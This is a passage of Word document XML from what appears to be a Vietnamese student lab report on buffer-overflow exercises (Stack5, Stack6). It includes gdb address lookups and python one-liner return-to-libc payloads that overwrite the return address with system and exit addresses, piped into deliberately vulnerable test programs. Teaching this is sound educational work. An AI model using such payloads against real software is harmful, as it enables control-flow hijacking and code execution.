    <w:p w14:paraId="53A5E4D2" w14:textId="0139413C" w:rsidR="00A55FD3" w:rsidRPr="00BF60F7" w:rsidRDefault="00A55FD3" w:rsidP="00BF60F7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A55FD3">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C883B05" wp14:editId="041E242A">
            <wp:extent cx="2788920" cy="3514638"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16017264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26436" name="Picture 1" descr="A diagram of a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4030" cy="35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25B" w14:textId="793A9666" w:rsidR="002E6BD8" w:rsidRDefault="00BF60F7" w:rsidP="00BF60F7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF60F7">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Hàm system thực thi một lệnh trong shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9E5155" w14:textId="46D609D5" w:rsidR="002E6BD8" w:rsidRDefault="00BF60F7" w:rsidP="00BF60F7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF60F7">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Tạo chương trình shell in chuỗi “You win!” với tên là a, đặt quyền thực thi: </w:t>
      </w:r>
      <w:r w:rsidR="002457D5" w:rsidRPr="002457D5">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F6F9FC6" wp14:editId="4A99E2C0">
            <wp:extent cx="5943600" cy="2225675"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="537995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502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3D6" w14:textId="33A32CE8" w:rsidR="002E6BD8" w:rsidRDefault="002457D5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002457D5">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15FE8D9C" wp14:editId="6DA61C62">
            <wp:extent cx="5943600" cy="1978660"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="300722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22163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41B8" w14:textId="4A98B8F1" w:rsidR="002E6BD8" w:rsidRDefault="00BF60F7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF60F7">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Tìm địa chỉ hàm system để thay thế cho địa chỉ hàm printf (là đối số của lệnh CALL)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF60F7">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:cr/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Dùng gdb để tim địa chỉ system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583C38ED" w14:textId="2D784230" w:rsidR="00BF60F7" w:rsidRDefault="00BF60F7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>print system để hiện địa chỉ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BBA615" w14:textId="3D4A7075" w:rsidR="00C400D9" w:rsidRDefault="002E6BD8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E6BD8">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DD25409" wp14:editId="30B03407">
            <wp:extent cx="5896527" cy="4533900"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="14472166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16602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7638" cy="45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FB72" w14:textId="1E6942E1" w:rsidR="00BF60F7" w:rsidRDefault="00BF60F7" w:rsidP="00BF60F7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF60F7">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Nhập chuỗi ./a,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> t</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF60F7">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>heo sau bởi kí tự kết thúc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF60F7">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>chuỗi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6707A017" w14:textId="4D7C1EE8" w:rsidR="00BF60F7" w:rsidRDefault="00BF60F7" w:rsidP="00BF60F7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF60F7">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>huỗi ký tự lấp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF60F7">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">đầy buf, lấp đầy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>cookie, 4 ký tự lấp đầy EPB cũ (</w:t>
      </w:r>
      <w:r w:rsidR="00015217">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>0x0c+4+4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A92C233" w14:textId="0C94C450" w:rsidR="00BF60F7" w:rsidRDefault="00BF60F7" w:rsidP="00BF60F7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF60F7">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>4 ký tự xác định địa chỉ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF60F7">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>quay về hàm system (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>0xB7E43DA0</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF60F7">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF8ABAC" w14:textId="4C291033" w:rsidR="00BF60F7" w:rsidRPr="00BF60F7" w:rsidRDefault="00BF60F7" w:rsidP="00BF60F7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>4 ký tự để lấp đầy địa chỉ trả về của system (aaaa)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50480567" w14:textId="339A30AF" w:rsidR="00BF60F7" w:rsidRDefault="00BF60F7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF60F7">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>4 ký tự xác định vị trí biến</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF60F7">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>buffer (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0xBFFFEFB4</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF60F7">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3437D7" w14:textId="638FBFB4" w:rsidR="007042C7" w:rsidRDefault="00EB07A5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB07A5">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">python -c </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB07A5">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>print("./a"+"\x00"*21+"\xa0\x3d\xe4\xb7"+"aaaa"+"\xb4\xef\xff\xbf")' | ./stack5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14609CF4" w14:textId="3AD2C8C9" w:rsidR="009E32D6" w:rsidRDefault="002457D5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002457D5">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="436D9B17" wp14:editId="73AC5EE4">
            <wp:extent cx="5943600" cy="1650365"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="546525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508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B18F" w14:textId="77777777" w:rsidR="00C400D9" w:rsidRDefault="00C400D9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="090DB8EB" w14:textId="09657FAC" w:rsidR="00C400D9" w:rsidRDefault="00C400D9" w:rsidP="00EF2828">
      <w:pPr>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc164791218"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Bài </w:t>
      </w:r>
      <w:r w:rsidR="00EF2828">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>6: Stack6.c</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="108CD8E3" w14:textId="03EF9CBC" w:rsidR="00C400D9" w:rsidRDefault="00015217">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>- Stack6.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D67C5B5" w14:textId="72C8C3DC" w:rsidR="00015217" w:rsidRDefault="00EB07A5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB07A5">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2674083F" wp14:editId="4E70C44F">
            <wp:extent cx="5943600" cy="4144645"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="3965447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44788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367" w14:textId="27C2D19A" w:rsidR="00C400D9" w:rsidRDefault="00015217">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">- Biên dịch chương trình: </w:t>
      </w:r>
      <w:r w:rsidRPr="00015217">
        <w:t xml:space="preserve">gcc -fno-stack-protector -mpreferred-stack-boundary=2 -m32 </w:t>
      </w:r>
      <w:r>
        <w:t>stack6</w:t>
      </w:r>
      <w:r w:rsidRPr="00015217">
        <w:t xml:space="preserve">.c -g -o </w:t>
      </w:r>
      <w:r>
        <w:t>stack6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A104597" w14:textId="76D84EE6" w:rsidR="00C400D9" w:rsidRDefault="00EB07A5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB07A5">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6357C404" wp14:editId="7DAB4A63">
            <wp:extent cx="5943600" cy="2623820"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="11020516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51604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90E" w14:textId="51B7783F" w:rsidR="00EB07A5" w:rsidRDefault="00015217">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>- Thực hiện lệnh cũ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6610C92C" w14:textId="01EDD49F" w:rsidR="00015217" w:rsidRDefault="00015217">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB07A5">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">python -c </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB07A5">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>print("./a"+"\x00"*21+"\xa0\x3d\xe4\xb7"+"aaaa"+"\xb4\xef\xff\xbf")' | ./</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>stack6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084B00C8" w14:textId="311D3933" w:rsidR="00EB07A5" w:rsidRDefault="00EB07A5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB07A5">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49283038" wp14:editId="5B2DBAF1">
            <wp:extent cx="5943600" cy="2043430"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2059171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115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5F0" w14:textId="646EC8B0" w:rsidR="00EB07A5" w:rsidRDefault="00015217" w:rsidP="00015217">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00015217">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Hàm system cũng như nhiều hàm khác, khi thực hiện xong tác</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00015217">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>vụ cũng sẽ phải trở về hàm gọi nó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1AAF09" w14:textId="4F98682D" w:rsidR="00EB07A5" w:rsidRDefault="00015217" w:rsidP="00015217">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Ép </w:t>
      </w:r>
      <w:r w:rsidRPr="00015217">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>hàm system quay về một lệnh, hoặc một</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00015217">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>hàm nào đó để chấm dứt chương trình, không tiếp tục quay về hàm gọi nó. Một</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00015217">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>trong những hàm không quay về là hàm exit. Hàm exit chấm dứt hoạt động</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00015217">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>của một chương trình với mã kết thúc là tham số được truyền vào.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53786A4D" w14:textId="7D76EEEA" w:rsidR="00A55FD3" w:rsidRDefault="00A55FD3" w:rsidP="00015217">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A55FD3">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56B87381" wp14:editId="48663FFD">
            <wp:extent cx="3296869" cy="3383280"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="20557329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2980" name="Picture 1" descr="A diagram of a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0658" cy="33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3E52" w14:textId="77777777" w:rsidR="00015217" w:rsidRDefault="00015217" w:rsidP="00015217">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23513431" w14:textId="2A824D7B" w:rsidR="00015217" w:rsidRDefault="00015217" w:rsidP="00015217">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>- Tìm địa chỉ hàm exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204A03DF" w14:textId="57BE98D0" w:rsidR="00015217" w:rsidRDefault="00015217" w:rsidP="00015217">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>print exit trong gdb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A45FC22" w14:textId="79002F77" w:rsidR="00EB07A5" w:rsidRDefault="00EB07A5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB07A5">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1729D794" wp14:editId="3BFAAF86">
            <wp:extent cx="5943600" cy="4437380"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="9678623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62318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D74" w14:textId="77777777" w:rsidR="0027376B" w:rsidRDefault="00015217" w:rsidP="0027376B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="0027376B">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="0027376B" w:rsidRPr="00BF60F7">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Nhập chuỗi ./a,</w:t>
      </w:r>
      <w:r w:rsidR="0027376B">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> t</w:t>
      </w:r>
      <w:r w:rsidR="0027376B" w:rsidRPr="00BF60F7">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>heo sau bởi kí tự kết thúc</w:t>
      </w:r>
      <w:r w:rsidR="0027376B">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0027376B" w:rsidRPr="00BF60F7">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>chuỗi</w:t>
      </w:r>
      <w:r w:rsidR="0027376B">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C92759" w14:textId="77777777" w:rsidR="0027376B" w:rsidRDefault="0027376B" w:rsidP="0027376B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF60F7">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>huỗi ký tự lấp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF60F7">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">đầy buf, lấp đầy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>cookie, 4 ký tự lấp đầy EPB cũ (0x0c+4+4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF7619D" w14:textId="77777777" w:rsidR="0027376B" w:rsidRDefault="0027376B" w:rsidP="0027376B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF60F7">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>4 ký tự xác định địa chỉ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF60F7">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>quay về hàm system (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>0xB7E43DA0</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF60F7">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD999C1" w14:textId="73B75719" w:rsidR="0027376B" w:rsidRPr="00BF60F7" w:rsidRDefault="0027376B" w:rsidP="0027376B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>4 ký tự xác định địa chỉ quay về hàm exit (0xb7e379d0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2655D4EB" w14:textId="77777777" w:rsidR="0027376B" w:rsidRDefault="0027376B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF60F7">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>4 ký tự xác định vị trí biến</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF60F7">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>buffer (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0xBFFFEFB4</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF60F7">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD219F7" w14:textId="05E7BD4D" w:rsidR="0027376B" w:rsidRDefault="00015217">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B747ED" w14:textId="57D0BC3B" w:rsidR="00EB07A5" w:rsidRDefault="00015217">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Thực thi chương trình:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010EA7FA" w14:textId="73A98AAC" w:rsidR="00015217" w:rsidRDefault="00015217" w:rsidP="00015217">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">python -c </w:t>
      </w:r>
      <w:r w:rsidR="00FD10D5">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>print("./a"+"\x00"*21+"\xa0\x3d\xe4\xb7"+"\xd0\x79\xe3\xb7"+"\xb4\xef\xff\xbf")' | ./stack6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C230747" w14:textId="77777777" w:rsidR="00015217" w:rsidRDefault="00015217">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58E2A7E1" w14:textId="14C3022F" w:rsidR="00EB07A5" w:rsidRDefault="00EB07A5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB07A5">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18378391" wp14:editId="159A200E">
            <wp:extent cx="5943600" cy="1576705"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
